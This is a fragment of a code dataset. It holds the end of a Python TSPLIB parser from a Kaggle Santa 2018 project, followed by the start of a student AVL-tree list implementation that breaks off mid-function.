BadTspFile('Unknown display data type in TSPLIB file <{}>'.format(content))\n\n else:\n raise BadTspFile('Unknown keyword in TSPLIB file <{}>'.format(token))\n\n elif buffer=='NODE_COORD_SECTION':\n state = 'node_coords_data'\n data['node_coords'] = {}\n\n elif buffer=='DEPOT_SECTION':\n state = 'depot_node_data'\n data['depot_node'] = []\n\n elif buffer=='DEMAND_SECTION':\n state = 'demand_data'\n data['demand'] = {}\n\n elif buffer=='EDGE_DATA_SECTION':\n state = 'edge_data'\n data['edge'] = {}\n\n elif buffer=='FIXED_EDGES_SECTION':\n state = 'fixed_edge_data'\n data['fixed_edges'] = {}\n\n elif buffer=='DISPLAY_DATA_SECTION':\n state = 'display_data'\n data['display'] = {}\n\n elif buffer=='TOUR_SECTION':\n state = 'tour_data'\n data['tour'] = []\n\n elif buffer=='EDGE_WEIGHT_SECTION':\n state = 'edge_weight_data'\n data['edge_weights'] = []\n\n elif buffer=='EOF':\n state='done'\n\n elif (state=='node_coords_data' or state=='depot_node_data' or state=='demand_data' or state=='edge_data'\n or state=='fixed_edge_data' or state=='display_data' or state=='tour_data' or state=='edge_weight_data'):\n\n if buffer=='NODE_COORD_SECTION':\n if 'node_coords' in data:\n raise BadTspFile('Duplicate node coordinate data in TSPLIB file')\n state = 'node_coords_data'\n data['node_coords'] = {}\n\n elif buffer=='DEPOT_SECTION':\n if 'depot_node' in data:\n raise BadTspFile('Duplicate debot node data in TSPLIB file')\n state = 'depot_node_data'\n data['depot_node'] = []\n\n elif buffer=='DEMAND_SECTION':\n if 'demand' in data:\n raise BadTspFile('Duplicate demand data in TSPLIB file')\n state = 'demand_data'\n data['demand'] = {}\n\n elif buffer=='EDGE_DATA_SECTION':\n if 'edge' in data:\n raise BadTspFile('Duplicate edge data in TSPLIB file')\n state = 'edge_data'\n data['edge'] = {}\n\n elif buffer=='FIXED_EDGES_SECTION':\n if 'fixed_edges' in data:\n raise BadTspFile('Duplicate fixed edge data in TSPLIB file')\n state = 'fixed_edge_data'\n data['fixed_edges'] = {}\n\n elif buffer=='DISPLAY_DATA_SECTION':\n if 'display' in data:\n raise BadTspFile('Duplicate display data in TSPLIB file')\n state = 'display_data'\n data['display'] = {}\n\n elif buffer=='TOUR_SECTION':\n if 'tour' in data:\n raise BadTspFile('Duplicate tour data in TSPLIB file')\n state = 'tour_data'\n data['tour'] = []\n\n elif buffer=='EDGE_WEIGHT_SECTION':\n if 'edge_weight' in data:\n raise BadTspFile('Duplicate edge weight data in TSPLIB file')\n state = 'edge_weight_data'\n data['edge_weights'] = []\n\n elif buffer=='EOF':\n state = 'done'\n\n else:\n if buffer=='-1':\n state = 'specification'\n\n elif state=='node_coords_data':\n if 'node_coord_type' not in specification:\n specification['node_coord_type'] = NodeCoordinateType.TWOD\n tmp = buffer.split()\n if specification['node_coord_type']==NodeCoordinateType.TWOD:\n data['node_coords'][int(tmp[0])] = [float(tmp[1]),float(tmp[2])]\n elif specification['node_coord_type']==NodeCoordinateType.THREED:\n data['node_coords'][int(tmp[0])] = [float(tmp[1]),float(tmp[2]),float(tmp[3])]\n else:\n raise BadTspFile('Cannot parse node coordinate data, unknown node coordinate type')\n\n elif state=='depot_node_data':\n data['depot_node'].append(int(buffer))\n\n elif state=='demand_data':\n g = re.search('([0-9]*) ([0-9]*)',buffer)\n data['demand'][g.group(1)] = g.group(2)\n\n elif state=='edge_data':\n tmp = buffer.split()\n if specification['edge_data_format']==EdgeDataFormat.EDGE_LIST:\n data['edge'][int(tmp[0])] = int(tmp[1])\n elif specification['edge_data_format']==EdgeDataFormat.ADJ_LIST:\n if tmp[-1]=='-1':\n data['edge'][int(tmp[0])] = [int(_x) for _x in tmp[1:-1]]\n else:\n raise BadTspFile('Adjacent edge data is improperly terminated (no -1)')\n else:\n raise ParsingError('The parser got confused - unknown edge data format')\n\n elif state=='fixed_edge_data':\n tmp = buffer.split()\n data['fixed_edges'][int(tmp[0])] = int(tmp[1])\n\n elif state=='display_data':\n if specification['display_data_type']==DisplayDataType.TWOD_DISPLAY:\n tmp = buffer.split()\n data['display'][int(tmp[0])] = [float(tmp[1]), float(tmp[2])]\n else:\n raise BadTspFile('Display data is provided when the display data type is not 2D')\n\n elif state=='tour_data':\n\n data['tour'] += [int(_x) for _x in buffer.split()]\n if data['tour'][-1] == -1:\n state = 'specification'\n data['tour'].pop()\n\n\n elif state=='edge_weight_data':\n data['edge_weights'] += [float(_x) for _x in buffer.split()]\n else:\n raise ParsingError('The parser got itself into an unknown state')\n\n if 'dimension' not in specification:\n raise BadTspFile('Require dimension information')\n if 'node_coord_type' not in specification:\n specification['node_coord_type']=NodeCoordinateType.NO_COORDINATES\n\n # Return the parsed data to the caller.\n return specification, data\n\n\n\ndef load(filename: str, **kwargs) -> Union[Solution,Problem]:\n \"\"\"Load and parse a TSPLIB file and call the appropriate generator to turn the dictionaries into objects.\n \n Additional options are passed directly to the parser (e.g., force_gzip).\n\n Parameters\n ----------\n filename : str\n Filename to load.\n\n Returns\n -------\n Union[Solution,Problem]\n Solution or Problem object. None if there was some problem.\n\n Raises\n ------\n BadTspFile\n If the file is badly formatted, or doesn't contain the right information for the type.\n \"\"\"\n result = None\n\n # Parse the TSPLIB file into two dictionaries.\n specification, data = parse_to_dict(filename, **kwargs)\n\n # Do some basic checks: we need a type.\n if 'type' not in specification:\n raise BadTspFile('Loaded file does not declare a type')\n\n # Check for a tour file - if it is then we construct a solution.\n if specification['type']=='TOUR':\n if 'tour' not in data:\n raise BadTspFile('Loaded a TOUR file without any tour data')\n\n result = generate_solution(specification, data)\n\n\n # Check for a symmetrical TSP - if it is we construct a problem.\n elif specification['type']==ProblemType.TSP:\n if ('edge_weight_type' not in specification):\n raise BadTspFile('Loaded a symmetrical TSP file without any edge weight specification')\n\n if (specification['edge_weight_type']==EdgeWeightType.EXPLICIT):\n if ('edge_weight_format' not in specification) or ('edge_weights' not in data):\n raise BadTspFile('Loaded a symmetrical TSP file with explicit edge weights but without a format or any data')\n result = generate_tsp(specification, data)\n else:\n if 'node_coord_type' not in specification:\n raise BadTspFile('Loaded a symmetrical TSP file with functional edge weights without any node coordinate type specification')\n if 'node_coords' not in data:\n raise BadTspFile('Loaded a symmetrical TSP file with functional edge weights without any node coordinate data')\n result = generate_tsp(specification, data)\n\n\n return result\n\n\n\ndef generate_tsp(specification: dict, data: dict) -> Problem:\n \"\"\"Generate a Problem object with a TSP type from parsed dictionaries\n\n Parameters\n ----------\n specification : dict\n Dictionary of specification data.\n data : dict\n Dictionary of data detailing the problem.\n\n Returns\n -------\n Problem\n Object containing the problem data.\n\n Raises\n ------\n BadTspFile\n If there was a problem in the data.\n \"\"\"\n\n result = Problem(ProblemType.TSP)\n\n result._edge_weight_type = specification['edge_weight_type']\n result._node_coord_type = specification['node_coord_type']\n result._name = specification['name']\n result._dimension = specification['dimension']\n\n if specification['node_coord_type']==NodeCoordinateType.TWOD:\n result._nodes = np.zeros((result._dimension,2), dtype=np.float32)\n if len(data['node_coords'])!=result._dimension:\n raise BadTspFile('Dimension does not match node coordinate length')\n elif specification['node_coord_type']==NodeCoordinateType.THREED:\n result._nodes = np.zeros((result._dimension,3), dtype=np.float32)\n if len(data['node_coords'])!=result._dimension:\n raise BadTspFile('Dimension does not match node coordinate length')\n else:\n pass\n\n if result._edge_weight_type==EdgeWeightType.ATT:\n result._metric = AttPseudoEuclidean()\n elif result._edge_weight_type==EdgeWeightType.CEILING_2D:\n result._metric = CeilEuclidean()\n elif result._edge_weight_type==EdgeWeightType.EUCLIDEAN_2D:\n result._metric = Euclidean()\n elif result._edge_weight_type==EdgeWeightType.EUCLIDEAN_3D:\n result._metric = Euclidean()\n elif result._edge_weight_type==EdgeWeightType.GEOGRAPHICAL:\n result._metric = Geographical()\n elif result._edge_weight_type==EdgeWeightType.MANHATTAN_2D:\n result._metric = Manhattan()\n elif result._edge_weight_type==EdgeWeightType.MANHATTAN_3D:\n result._metric = Manhattan()\n elif result._edge_weight_type==EdgeWeightType.MAXIMUM_2D:\n result._metric = MaximumLinf()\n elif result._edge_weight_type==EdgeWeightType.MAXIMUM_3D:\n result._metric = MaximumLinf()\n\n if 'node_coords' in data:\n for k,v in data['node_coords'].items():\n result._nodes[k-1] = v\n\n if 'edge_weights' in data:\n result._edge_weights = np.zeros((result._dimension,result._dimension))\n if specification['edge_weight_format']==EdgeWeightFormat.FULL_MATRIX:\n result._edge_weights = np.reshape(data['edge_weights'], (result._dimension,result._dimension))\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_ROW:\n # No diagonal.\n w = result._dimension - 1\n j = 0\n for i in range(result._dimension-1):\n result._edge_weights[i,i+1:] = data['edge_weights'][j:(j+w)]\n j += w\n w -= 1\n result._edge_weights = result._edge_weights + result._edge_weights.T\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_ROW:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_DIAG_ROW:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_DIAG_ROW:\n # With diagonal.\n w = 1\n j = 0\n for i in range(result._dimension):\n result._edge_weights[i,:w] = data['edge_weights'][j:(j+w)]\n j += w\n w += 1\n result._edge_weights = result._edge_weights + result._edge_weights.T\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_COL:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_COL:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.UPPER_DIAG_COL:\n raise UnsupportedEdgeWeight()\n\n elif specification['edge_weight_format']==EdgeWeightFormat.LOWER_DIAG_COL:\n raise UnsupportedEdgeWeight()\n\n return result\n\n\ndef generate_solution(specification: dict, data: dict) -> Solution:\n \"\"\"Generate a solution object containing tour data parsed from dictionaries\n\n Parameters\n ----------\n specification : dict\n Dictionary of specification data.\n data : dict\n Dictionary of data detailing the tour.\n\n\n Returns\n -------\n Solution\n Object containing the tour data.\n\n Raises\n ------\n BadTspFile\n If there was a problem in the data.\n \"\"\"\n\n result = Solution()\n\n if 'dimension' in specification:\n if specification['dimension']!=len(data['tour']):\n raise BadTspFile('Length of tour data does not match dimension')\n result.dimension = specification['dimension']+1\n else:\n result.dimension = len(data['tour'])+1\n\n if 'name' in specification:\n result.name = specification['name']\n\n [result.append_comment(_x) for _x in specification['comments']]\n\n result.data = np.array(data['tour'])-1\n\n return result\n","repo_name":"chrisarridge/kaggle-santa-2018","sub_path":"source/santaslittletsplib/libparser.py","file_name":"libparser.py","file_ext":"py","file_size_in_byte":21018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26207043317","text":"#username - eviatars\n#id1 - 322623182\n#name1 - Eviatar Shemesh\n#id2 - 208392290\n#name2 - Yoav Malichi\n\n\n\"\"\"A class representing a node in an AVL tree\"\"\"\n\n\nclass AVLNode(object):\n\t\"\"\"Constructor, you are allowed to add more fields.\n\n\t@type value: str\n\t@param value: data of your node\n\t\"\"\"\n\tdef __init__(self, value):\n\t\tself.value = value\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.parent = None\n\t\tself.size = 0\n\t\tself.height = -1\n\n\n\t\"\"\"returns the left child\n\t@rtype: AVLNode\n\t@returns: the left child of self, None if there is no left child\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getLeft(self):\n\t\treturn self.left\n\n\n\t\"\"\"returns the right child\n\n\t@rtype: AVLNode\n\t@returns: the right child of self, None if there is no right child\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getRight(self):\n\t\treturn self.right\n\n\t\"\"\"returns the parent \n\n\t@rtype: AVLNode\n\t@returns: the parent of self, None if there is no parent\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getParent(self):\n\t\treturn self.parent\n\n\t\"\"\"return the value\n\n\t@rtype: str\n\t@returns: the value of self, None if the node is virtual\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getValue(self):\n\t\tif self.isRealNode():\n\t\t\treturn self.value\n\t\treturn None\n\n\t\"\"\"returns the height\n\n\t@rtype: int\n\t@returns: the height of self, -1 if the node is virtual\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef getHeight(self):\n\t\tif self.isRealNode():\n\t\t\treturn self.height\n\t\treturn -1\n\n\t\"\"\"returns the size\n\n\t@rtype: int\n\t@returns: the size of self, virtual node size is 0\n\t\"\"\"\n\n\tdef getSize(self):\n\t\treturn self.size\n\n\t\"\"\"returns the balance factor of a given node \n\n\t@rtype: int\n\t@returns: height of left child of self - height of right child of self, 0 if virtual node\n\t\"\"\"\n\n\tdef getBalanceFactor(self):\n\t\tif self.isRealNode():\n\t\t\treturn self.getLeft().height - self.getRight().height\n\t\treturn 0\n\n\t\"\"\"recomputes the size of a Node inplace\n\t\n\t@returns: None\n\t\"\"\"\n\tdef recomputeSize(self):\n\t\tif self.isRealNode():\n\t\t\tself.size = self.left.size + 1 + self.right.size\n\n\t\"\"\"recomputes the height of a Node inplace\n\n\t@returns: None\n\t\"\"\"\n\n\tdef recomputeHeight(self):\n\t\tif self.isRealNode():\n\t\t\tself.height = max(self.left.height, self.right.height) + 1\n\n\t\"\"\"sets left child\n\n\t@type node: AVLNode\n\t@param node: a node\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setLeft(self, node):\n\t\tself.left = node\n\n\t\"\"\"sets right child\n\n\t@type node: AVLNode\n\t@param node: a node\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setRight(self, node):\n\t\tself.right = node\n\n\t\"\"\"sets parent\n\n\t@type node: AVLNode\n\t@param node: a node\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setParent(self, node):\n\t\tself.parent = node\n\n\t\"\"\"sets value\n\n\t@type value: str\n\t@param value: data\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setValue(self, value):\n\t\tself.value = value\n\n\t\"\"\"sets the height of the node\n\n\t@type h: int\n\t@param h: the height\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef setHeight(self, h):\n\t\tself.height = h\n\n\t\"\"\"sets the size of the node\n\n\t@type s: int\n\t@param s: the size \n\t\"\"\"\n\n\tdef setSize(self, s):\n\t\tself.size = s\n\t\"\"\"returns whether self is not a virtual node \n\n\t@rtype: bool\n\t@returns: False if self is a virtual node, True otherwise.\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef isRealNode(self):\n\t\treturn self.height != -1\n\n\t\"\"\" returns true whether self is a leaf\n\t\n\t\t@rtype: bool\n\t\t@returns: False if self is not a leaf (has a right/left son such that they are not virtual nodes), \n\t\tTrue otherwise\n\t\t@Time complexity: O(1)\n\t\t\"\"\"\n\n\tdef isLeaf(self):\n\t\treturn self.getHeight() == 0\n\n\n\n\"\"\"\nA class implementing the ADT list, using an AVL tree.\n\"\"\"\n\nclass AVLTreeList(object):\n\n\t\"\"\"\n\tConstructor\n\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.root = None\n\t\tself.first_node = None\n\t\tself.last_node = None\n\n\n\t\"\"\"returns whether the list is empty\n\n\t@rtype: bool\n\t@returns: True if the list is empty, False otherwise\n\t@Time complexity: O(1)\n\t\"\"\"\n\tdef empty(self):\n\t\treturn self.root is None\n\n\t\"\"\"retrieves the value of the i'th item in the list\n\n\t@type i: int\n\t@pre: 0 <= i < self.length()\n\t@param i: index in the list\n\t@rtype: str\n\t@returns: the the value of the i'th item in the list\n\t\n\tTime Complexity:\n\tRecursion that in worst case goes every call goes one son left / one son right until the deepest leaf\n\tMeaning that the maximum calls is the height of tree\n\tIn every recursion call there is O(1) work, and the height of the tree is O(logn)\n\tThat is why, in total, as we saw in the lecture, the time complexity is O(logn) in the worst case\n\t\"\"\"\n\tdef retrieve(self, i):\n\n\t\troot = self.getRoot()\n\n\t\tdef retrieveRec(node, j):\n\t\t\tloc = node.left.size + 1\n\n\t\t\tif loc == j:\n\t\t\t\treturn node.getValue()\n\t\t\telif j < loc:\n\t\t\t\treturn retrieveRec(node.left, j)\n\t\t\telse:\n\t\t\t\treturn retrieveRec(node.right, j - loc)\n\n\t\treturn retrieveRec(root, i + 1)\n\n\t\"\"\"retrieves the AVLNode that is the i'th item in the list\n\n\t@type i: int\n\t@pre: 0 <= i < self.length()\n\t@param i: index in the list\n\t@rtype: AVLNode\n\t@returns: the AVLNode that is the i'th item in the list\n\n\tTime Complexity:\n\tRecursion that in worst case goes every call goes one son left / one son right until the deepest leaf\n\tMeaning that the maximum calls is the height of tree\n\tIn every recursion call there is O(1) work, and the height of the tree is O(logn)\n\tThat is why, in total, as we saw in the lecture, the time complexity is O(logn) in the worst case\n\t\"\"\"\n\n\tdef retrieveNode(self, i):\n\n\t\troot = self.getRoot()\n\n\t\tdef retrieveRec(node, j):\n\t\t\tloc = node.left.size + 1\n\n\t\t\tif loc == j:\n\t\t\t\treturn node\n\t\t\telif j < loc:\n\t\t\t\treturn retrieveRec(node.left, j)\n\t\t\telse:\n\t\t\t\treturn retrieveRec(node.right, j - loc)\n\n\t\treturn retrieveRec(root, i + 1)\n\n\t\"\"\"inserts val at position i in the list\n\n\t@type i: int\n\t@pre: 0 <= i <= self.length()\n\t@param i: The intended index in the list to which we insert val\n\t@type val: str\n\t@param val: the value we insert\n\t@rtype: list\n\t@returns: the number of rebalancing operation due to AVL rebalancing\n\t\"\"\"\n\n\tdef insert(self, i, val):\n\t\tinserted = AVLNode(val)\n\t\tinserted.setHeight(0)\n\t\tinserted.setSize(1)\n\t\tvirtualL = AVLNode(\"\")\n\t\tvirtualR = AVLNode(\"\")\n\t\tinserted.setLeft(virtualL)\n\t\tinserted.setRight(virtualR)\n\t\tvirtualL.setParent(inserted)\n\t\tvirtualR.setParent(inserted)\n\n\t\t#insterted node will be root\n\t\tif(self.empty()):\n\t\t\tself.root = inserted\n\t\t\tself.set_First(inserted)\n\t\t\tself.set_Last(inserted)\n\t\t\tinserted.recomputeHeight()\n\t\t\tinserted.recomputeSize()\n\t\t\treturn 0\n\n\t\t#insert at the begin of list\n\t\tif i == 0:\n\t\t\tnode = self.get_First()\n\t\t\tnode.setLeft(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\tself.set_First(inserted)\n\t\t\treturn self.reBalance(node)\n\n\n\t\t#insert at end of list\n\t\telif i == self.length():\n\t\t\tnode = self.get_Last()\n\t\t\tnode.setRight(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\tself.set_Last(inserted)\n\t\t\treturn self.reBalance(node)\n\n\t\t#get current i'th node\n\t\tnode = self.retrieveNode(i)\n\n\t\t#has left son, need to insert right of the predecessor, has no right son\n\t\tif node.getLeft().isRealNode():\n\t\t\tnode = self.predecessor(node)\n\t\t\tnode.setRight(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\treturn self.reBalance(node)\n\n\t\t#insert as left son of i'th node\n\t\telse:\n\t\t\tnode.setLeft(inserted)\n\t\t\tinserted.setParent(node)\n\t\t\treturn self.reBalance(node)\n\n\t\"\"\"deletes the i'th item in the list\n\n\t@type i: int\n\t@pre: 0 <= i < self.length()\n\t@param i: The intended index in the list to be deleted\n\t@rtype: int\n\t@returns: the number of rebalancing operation due to AVL rebalancing\n\t\n\t@Time Complexity worst case:\n\tsuccessor - called once - O(logn) [see successor]\n\tswapNodes - O(1)\n\tdeleteLeaf - called once - O(logn) [see deleteLeaf]\n\tdeleteOneChildedNode - called once - O(logn [see deleteOneChildedNode]\n\tOthers - O(1)\n\tTotal: O(logn)\n\t\"\"\"\n\tdef delete(self, i):\n\t\tnodeToDelete = self.retrieveNode(i)\n\t\tif nodeToDelete.isLeaf(): # case 1 - lecture 2 slide 51\n\t\t\treturn self.deleteLeaf(nodeToDelete, '1')\n\t\telif nodeToDelete.getLeft().isRealNode() and not nodeToDelete.getRight().isRealNode(): # case 2.1 - lecture 2 slide 51\n\t\t\treturn self.deleteOneChildedNode(nodeToDelete, 'left')\n\t\telif nodeToDelete.getRight().isRealNode() and not nodeToDelete.getLeft().isRealNode(): # case 2.2 - lecture 2 slide 51\n\t\t\treturn self.deleteOneChildedNode(nodeToDelete, 'right')\n\t\telse: # case 3 - lecture 2 slide 51\n\t\t\tnodeToDeleteSuccessor = self.successor(nodeToDelete)\n\t\t\tif not nodeToDeleteSuccessor.isLeaf(): # i.e. it has 1 right child only (if 2 then it wasn't the successor)\n\t\t\t\tself.swapNodes(nodeToDelete, nodeToDeleteSuccessor)\n\t\t\t\treturn self.deleteOneChildedNode(nodeToDelete, 'right')\n\t\t\telse:\n\t\t\t\tself.swapNodes(nodeToDelete, nodeToDeleteSuccessor)\n\t\t\t\treturn self.deleteLeaf(nodeToDelete, '3')\n\n\t\"\"\" deletes a node that has one child (bypass)\n\t\n\t@type nodeToDelete: AVLNode\n\t@pre: nodeToDelete is not None and has only one real child\n\t@param nodeToDelete: node to delete\n\t\n\t@type childSide: str\n\t@param childSide: nodeToDelete's child side is real node, and the other child is virtual\n\t\n\t@rtype: int\n\t@return: total balance operations that were required during the delete operation\n\t@Time complexity worst case:\n\tO(1) - getters & setters\n\treBalance - O(logn) [see reBalance]\n\tsuccessor / predecessor - O(logn)\n\ttotal: O(logn)\n\t\"\"\"\n\tdef deleteOneChildedNode(self, nodeToDelete, childSide):\n\t\tif childSide == 'left':\n\t\t\tnodeToDeleteParent = nodeToDelete.getParent()\n\t\t\tnodeToDeleteLeftSon = nodeToDelete.getLeft()\n\t\t\tif nodeToDelete is self.get_Last():\n\t\t\t\tself.set_Last(self.predecessor(nodeToDelete))\n\t\t\tnodeToDeleteLeftSon.setParent(nodeToDeleteParent)\n\t\t\tnodeToDelete.setLeft(AVLNode(None))\n\t\t\tnodeToDelete.getLeft().setParent(nodeToDeleteLeftSon)\n\t\t\tnodeToDelete.setParent(None)\n\t\t\tif self.getRoot() is nodeToDelete: # i.e. nodeToDeleteParent is None\n\t\t\t\tself.root = nodeToDeleteLeftSon\n\t\t\telse:\n\t\t\t\tif nodeToDeleteParent.getLeft() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setLeft(nodeToDeleteLeftSon)\n\t\t\t\telif nodeToDeleteParent.getRight() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setRight(nodeToDeleteLeftSon)\n\t\t\tbalanceOps = self.reBalance(nodeToDeleteParent)\n\n\t\telif childSide == 'right':\n\t\t\tnodeToDeleteParent = nodeToDelete.getParent()\n\t\t\tnodeToDeleteRightSon = nodeToDelete.getRight()\n\t\t\tif nodeToDelete is self.get_First(): # irrelevant in case 3\n\t\t\t\tself.set_First(self.successor(nodeToDelete))\n\t\t\tnodeToDeleteRightSon.setParent(nodeToDeleteParent)\n\t\t\tnodeToDelete.setRight(AVLNode(None))\n\t\t\tnodeToDelete.getRight().setParent(nodeToDeleteRightSon)\n\t\t\tnodeToDelete.setParent(None)\n\t\t\tif self.getRoot() is nodeToDelete: # i.e. nodeToDeleteParent is None\n\t\t\t\tself.root = nodeToDeleteRightSon\n\t\t\telse:\n\t\t\t\tif nodeToDeleteParent.getLeft() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setLeft(nodeToDeleteRightSon)\n\t\t\t\telif nodeToDeleteParent.getRight() is nodeToDelete:\n\t\t\t\t\tnodeToDeleteParent.setRight(nodeToDeleteRightSon)\n\t\t\tbalanceOps = self.reBalance(nodeToDeleteParent)\n\n\t\treturn balanceOps\n\n\t\"\"\" deletes a node that is a leaf\n\n\t\t@type nodeToDelete: AVLNode\n\t\t@pre: nodeToDelete is not None and has 2 virtual sons\n\t\t@param nodeToDelete: node to delete\n\n\t\t@type case: str\n\t\t@param case: case 1 / 3 (original node is a leaf / successor is a leaf respectively)\n\n\t\t@rtype: int\n\t\t@return: total balance operations that were required during the delete operation\n\t\t\n\t\t@Time complexity:\n\t\tO(1) - getters & setters\n\t\treBalance - O(logn) [see reBalance]\n\t\tpredecessor - O(logn)\n\t\tsuccessor - O(logn)\n\t\ttotal: O(logn)\n\t\t\"\"\"\n\tdef deleteLeaf(self, nodeToDelete, case):\n\t\tnodeToDeleteParent = nodeToDelete.getParent()\n\t\tif case == '1':\n\t\t\tif nodeToDelete is self.getRoot():\n\t\t\t\tself.root = None\n\t\t\t\tself.set_Last(None)\n\t\t\t\tself.set_First(None)\n\t\t\t\treturn 0\n\n\t\tif nodeToDelete is self.get_First():\n\t\t\tself.set_First(self.successor(nodeToDelete))\n\t\tif nodeToDelete is self.get_Last():\n\t\t\tself.set_Last(self.predecessor(nodeToDelete))\n\n\t\tnodeToDelete.setParent(None)\n\t\tif nodeToDeleteParent.getLeft() is nodeToDelete:\n\t\t\tnodeToDeleteParent.setLeft(AVLNode(None))\n\t\t\tnodeToDeleteParent.getLeft().setParent(nodeToDeleteParent)\n\t\telif nodeToDeleteParent.getRight() is nodeToDelete:\n\t\t\tnodeToDeleteParent.setRight(AVLNode(None))\n\t\t\tnodeToDeleteParent.getRight().setParent(nodeToDeleteParent)\n\t\tbalanceOps = self.reBalance(nodeToDeleteParent)\n\t\treturn balanceOps\n\n\n\t\"\"\" Swapping 2 nodes (changing pointers)\n\t\n\t@pre: boths node1, node2 are AVLNodes\n\t\n\t@type node1: AVLNode\n\t@param node1: an AVLNode\n\t\n\t@type node2: AVLNode\n\t@param node2: an AVLNode\n\t\n\t@rtype: None\n\t\"\"\"\n\n\tdef swapNodes(self, node1, node2):\n\t\tnode1Parent = node1.getParent()\n\t\tnode1Left = node1.getLeft()\n\t\tnode1Right = node1.getRight()\n\n\t\tnode2Parent = node2.getParent()\n\t\tnode2Left = node2.getLeft()\n\t\tnode2Right = node2.getRight()\n\n\t\tdone = False\n\t\t# case node1Parent == node2Parent\n\t\t# do not switch node1, node2 parents, just switch left and right of parent & sons\n\t\tif node1Parent and node2Parent and node1Parent is node2Parent:\n\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\tnode1Parent.setRight(node1)\n\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\tnode1Parent.setRight(node2)\n\t\t\t\tnode1Parent.setLeft(node1)\n\t\t\tnode1.setLeft(node2Left)\n\t\t\tnode2Left.setParent(node1)\n\t\t\tnode1.setRight(node2Right)\n\t\t\tnode2Right.setParent(node1)\n\t\t\tnode2.setLeft(node1Left)\n\t\t\tnode1Left.setParent(node2)\n\t\t\tnode2.setRight(node1Right)\n\t\t\tnode1Right.setParent(node2)\n\t\t\tdone = True\n\n\t\t# if we get here then node1Parent is not node2Parent\n\t\telse:\n\t\t\tif node1Parent:\n\t\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\t\tif node1Parent is not node2:\n\t\t\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node2Parent:\n\t\t\t\t\t\t\tif node2Parent.getLeft() is node2:\n\t\t\t\t\t\t\t\tnode2Parent.setLeft(node1)\n\t\t\t\t\t\t\telif node2Parent.getRight() is node2:\n\t\t\t\t\t\t\t\tnode2Parent.setRight(node1)\n\t\t\t\t\t\tnode1.setParent(node2Parent)\n\t\t\t\t\t\tnode1.setLeft(node2)\n\t\t\t\t\t\tnode1.setRight(node2Right)\n\t\t\t\t\t\tnode2Right.setParent(node1)\n\n\t\t\t\t\t\tnode2.setLeft(node1Left)\n\t\t\t\t\t\tnode1Left.setParent(node2)\n\t\t\t\t\t\tnode2.setRight(node1Right)\n\t\t\t\t\t\tnode1Right.setParent(node2)\n\t\t\t\t\t\tnode2.setParent(node1)\n\n\t\t\t\t\t\tdone = True\n\n\t\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\t\tif node1Parent is not node2:\n\t\t\t\t\t\tnode1Parent.setRight(node2)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node2Parent:\n\t\t\t\t\t\t\tif node2Parent.getLeft() is node2:\n\t\t\t\t\t\t\t\tnode2Parent.setLeft(node1)\n\t\t\t\t\t\t\telif node2Parent.getRight() is node2:\n\t\t\t\t\t\t\t\tnode2Parent.setRight(node1)\n\t\t\t\t\t\tnode1.setParent(node2Parent)\n\t\t\t\t\t\tnode1.setRight(node2)\n\t\t\t\t\t\tnode1.setLeft(node2Left)\n\t\t\t\t\t\tnode2Left.setParent(node1)\n\n\t\t\t\t\t\tnode2.setLeft(node1Left)\n\t\t\t\t\t\tnode1Left.setParent(node2)\n\t\t\t\t\t\tnode2.setRight(node1Right)\n\t\t\t\t\t\tnode1Right.setParent(node2)\n\t\t\t\t\t\tnode2.setParent(node1)\n\n\t\t\t\t\t\tdone = True\n\n\t\t\tif node2Parent:\n\t\t\t\tif node2Parent.getLeft() is node2:\n\t\t\t\t\tif node2Parent is not node1:\n\t\t\t\t\t\tnode2Parent.setLeft(node1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif node1Parent:\n\t\t\t\t\t\t\tif node1Parent.getLeft() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setLeft(node2)\n\t\t\t\t\t\t\telif node1Parent.getRight() is node1:\n\t\t\t\t\t\t\t\tnode1Parent.setRight(node2)\n\t\t\t\t\t\tnode2.setParent(node1Parent)\n\t\t\t\t\t\tnode2.setLeft(node1)\n\t\t\t\t\t\tnode2.setRight(node1Right)\n\t\t\t\t\t\tnode1Right.setParent(node2)\n\n\t\t\t\t\t\tnode1.setLeft(node2Left)\n\t\t\t\t\t\tnode2Left.setParent(node1)\n\t\t\t\t\t\tnode1.setRight(node2Right)\n\t\t\t\t\t\tnode2Right.setParent(node1)\n\t\t\t\t\t\tnode1.setParent(node2)\n\n\t\t\t\t\t\tdone = True\n\n\t\t\t\telif node2Parent.getRight() is node2:\n\t\t\t\t\tif node2Parent is not 